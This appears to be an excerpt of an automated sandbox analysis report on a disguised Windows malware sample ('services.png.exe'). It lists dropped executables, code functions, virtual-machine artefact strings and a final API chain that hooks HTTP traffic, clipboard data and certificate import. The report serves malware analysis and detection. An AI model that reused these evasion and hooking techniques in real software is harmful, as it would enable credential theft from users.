                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,1_2_004394BB
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,1_2_00439576
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438BDCE0 FindFirstFileExW,2_2_000001CD438BDCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A656DCE0 FindFirstFileExW,3_2_00000151A656DCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29CFDCE0 FindFirstFileExW,4_2_0000019E29CFDCE0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4EDCE0 FindFirstFileExW,5_2_000001F28B4EDCE0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B54DCE0 FindFirstFileExW,5_2_000001F28B54DCE0
                        Source: C:\Windows\explorer.exeCode function: 6_2_0907DCE0 FindFirstFileExW,6_2_0907DCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D596DCE0 FindFirstFileExW,7_2_00000221D596DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC69DCE0 FindFirstFileExW,9_2_000001ECFC69DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D17874DCE0 FindFirstFileExW,14_2_000001D17874DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787ADCE0 FindFirstFileExW,14_2_000001D1787ADCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6120DCE0 FindFirstFileExW,17_2_0000023B6120DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6126DCE0 FindFirstFileExW,17_2_0000023B6126DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7EDCE0 FindFirstFileExW,18_2_000002135E7EDCE0
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E818DCE0 FindFirstFileExW,19_2_000001F6E818DCE0
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,0_2_00433EDE
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
                        Source: svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
                        Source: SearchApp.exe, 0000000A.00000003.1887968363.0000024B5A30C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe
                        Source: nyheukpo.exe, 00000001.00000002.2935128249.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2219902983.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626813607.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2205551996.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2508191877.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2184984523.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2997437165.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734659917.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1750623185.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: explorer.exe, 00000006.00000000.1751487185.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                        Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ddddddddccccccccccbbbbbbbbbbbbbbbaaaaaaaaaaaaa``````@
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 8E}\Longman\L*|vmware horizon client*|vm ware8394
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: A-C0F2E0B9FA8*|vmware workstation 12 player*|vmpl5459
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7*|wacom preferences*|bamboo3652E}\TP-LINK\USB*|visual studio code*|visual code6793er.exe1*|watchtower research*|wtr14332E0B9FA8E}\Leic*|watchtower translation system*|wts244r.exe*|vmware horizon client*|view5503eMatchingPuz*|wave viewpoint*|vertical2985g.winrt12388
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|mstsc1643m M*|vegas pro 13.0 (64-bit)*|sony vegas4226AF0-*|total video converter*|tvc2449roStation CON*|track-it! technician client*|trackit2470386*|vmware vsphere client*|vspe63888E}\DGIT\Dan*|vmware vsphere client*|vcenter5038{6D809377*|vmware workstation 15 player*|vmplayer6438*|voice recorder*|voice recording80347
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: r.exe*|vmware horizon client*|view5503
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: E}\Att\Att.ex*|vmware horizon client*|vmare7220
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A4*|visual studio code*|visuak9719AP\Qsync\Qsyn*|visual studio code*|visula8564A-C0F2E0B9FA8*|vmware workstation 12 player*|vmpl545987
                        Source: explorer.exe, 00000006.00000000.1751487185.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                        Source: explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                        Source: explorer.exe, 00000006.00000000.1750623185.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                        Source: SearchApp.exe, 0000000A.00000000.1934841532.0000024B59D5E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|vmware6886
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
                        Source: SearchApp.exe, 0000000A.00000003.1826598931.0000024B5CB02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: |*|qemu10642
                        Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware horizon clientsidersrecord voice:wux:record voicevmware vsphere client
                        Source: explorer.exe, 00000006.00000002.3089421963.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
                        Source: RuntimeBroker.exe, 00000009.00000000.1786938102.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: F-A0*|hyper-v manager*|virtual5441
                        Source: explorer.exe, 00000006.00000002.3098429643.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware horizon client
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
                        Source: explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                        Source: explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 00000006.00000002.3133456773.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}onnnnnnnnnnnnnnnmmmmmmmmmmmmmmllllllllllllllllllkkkk@
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|qemu10642
                        Source: nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6.2; ARM; Trident/8.0; Touch; rv:11.0; WPDesktop) like Gecko
                        Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 player
                        Source: svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
                        Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 15 playerwaK
                        Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}onnnnnnnnnnnnnnnmmmmmmmmmmmmmmllllllllllllllllllkkkk@
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
                        Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 15 player
                        Source: SearchApp.exe, 0000000A.00000003.1887968363.0000024B5A30C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exeex
                        Source: services.png.exe, 00000000.00000002.2168632443.000000000049E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Ko*|internet download manager*|idman7834Center_*|internet download manager*|idmm8541team://r*|ibm integration toolkit 10.0.0.7*|iib403A-C*|i.r.i.s. ocr registration*|iris1117Applicat*|ibm integration toolkit 10.0.0.12*|iib1F-A0*|hyper-v manager*|virtual5441ArcaEvolution\A*|ibm integration toolkit 10.0.0.15*|iib1F2E0*|idle (python gui)*|python idle5336nt\Commun*|ibm integration toolkit 10.0.0.11*|iib144B-*|image composite editor*|ice852rocare.exe12*|integrated architecture builder*|iab1Langri*|integrated dealer systems - g2*|ids1249-A0F*|idle (python 3.7 32-bit)*|idel6028ABX\v5.15*|income tax planner workstation*|bna1
                        Source: SearchApp.exe, 0000000A.00000003.1891881714.0000024340D8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App
                        Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: E0B9FA8E}\A*|vmware horizon client*|vdi3894
                        Source: explorer.exe, 00000006.00000000.1750623185.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                        Source: explorer.exe, 00000006.00000000.1747285438.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                        Source: SearchApp.exe, 0000000A.00000003.1891881714.0000024340D8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Zultys\MXIE\Bin\mxie.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\SAP\NWBC60\NWBC.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ExitLag\ExitLag.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\BYOND\bin\byond.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\S.I.Ap\AFIP\siap.exeAirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App93int
                        Source: explorer.exe, 00000006.00000002.3098429643.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377*|vmware workstation 15 player*|vmplayer6438
                        Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}KJKLKLLLLKLLKKJJJKLLJKKKKLKIIJKKJJJJJJJJIIIJHHIIIIHH@z
                        Source: explorer.exe, 00000006.00000002.3133456773.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ddddddddccccccccccbbbbbbbbbbbbbbbaaaaaaaaaaaaa``````@
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
                        Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware vsphere client
                        Source: SearchApp.exe, 0000000A.00000000.1825817266.0000024B444A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 playeramp64ver644
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D8*|hpe unified functional testing*|uft1\CTI De*|huawei operation & maintenance system*|lmt1*|hyper-v manager*|hyper v4919\KKT\bin\fptr10*|idle (python 3.7 64-bit)*|idel59960F2E0B9FA*|ibm notes (basic)*|lotus3079er.exe12577
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {*|visual studio 2019*|devenv6360E}\Att\Att.ex*|vmware horizon client*|vmare7220E0B9FA8E}\A*|vmware horizon client*|vdi3894ys.exe12389
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|visual studio 2015*|visula72818E}\Longman\L*|vmware horizon client*|vm ware8394BFC-874A-*|vpn access manager*|shrew3128kerStrategy.co*|visual studio code*|vscode4061EF-A0FB-4BFC-*|visual studio 2015*|vius7396tion\3D Vision\*|visual studio code*|visy9233-4BFC-874A-C0F2*|voice recorder*|recording5394s\x86\windbg.e*|voyager workstation administration*|vwa1xnw*|wacom tablet properties*|intuos65524A-C0F2E*|watchtower media suite*|wms1ofessional\cute*|visual studio 2015*|visy7256E5D-B744-2EB1AE*|visual studio code*|vius9283ngodb.compass1*|visual studio 2017*|devenv57290B9FA8E}\SPSS*|visual studio code*|vs code67864
                        Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Sparx Systems\EA\EA.exe{6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe32988BernardoZamora.SolitaireHD_1fgex2kbsn6g8!App{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PSPad editor\PSPad.exe{6D809377-6AF0-444B-8957-A3773F02200E}\KMSpico\scripts\Log.cmd{6D809377-6AF0-444B-8957-A3773F02200E}\PureRef\PureRef.exe{6D809377-6AF0-444B-8957-A3773F02200E}\Mailbird\Mailbird.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AirPort\APUtil.exe10803{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\TeraPad\TeraPad.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MusicBee\MusicBee.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\uTorrent\uTorrent.exe
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
                        Source: svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
                        Source: explorer.exe, 00000006.00000000.1755557906.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}wwwwwwwwwwwwwwwwvvvvvvvvvvvvvvvvvvvvuuuuuuuuuuuuuuuu@my
                        Source: SearchApp.exe, 0000000A.00000000.1871879323.0000024B55466000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lyncvmwareonenoteneroXK
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 386*|vmware vsphere client*|vspe6388
                        Source: SearchApp.exe, 0000000A.00000003.1893666557.0000024B4223E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 8E}\DGIT\Dan*|vmware vsphere client*|vcenter5038
                        Source: SearchApp.exe, 0000000A.00000003.1884130039.0000024B5A435000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5038
                        Source: explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: C:\Users\user\Desktop\services.png.exeAPI call chain: ExitProcess graph end nodegraph_0-50345
                        Source: C:\Users\user\Desktop\services.png.exeAPI call chain: ExitProcess graph end nodegraph_0-49984
                        Source: C:\Users\user\Desktop\services.png.exeAPI call chain: ExitProcess graph end nodegraph_0-49451
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeAPI call chain: ExitProcess graph end nodegraph_1-26842
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeAPI call chain: ExitProcess graph end nodegraph_1-27141
                        Source: C:\Users\user\Desktop\services.png.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004263F3 NtCreateUserProcess,NtCreateThread,LdrLoadDll,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,0_2_004263F3
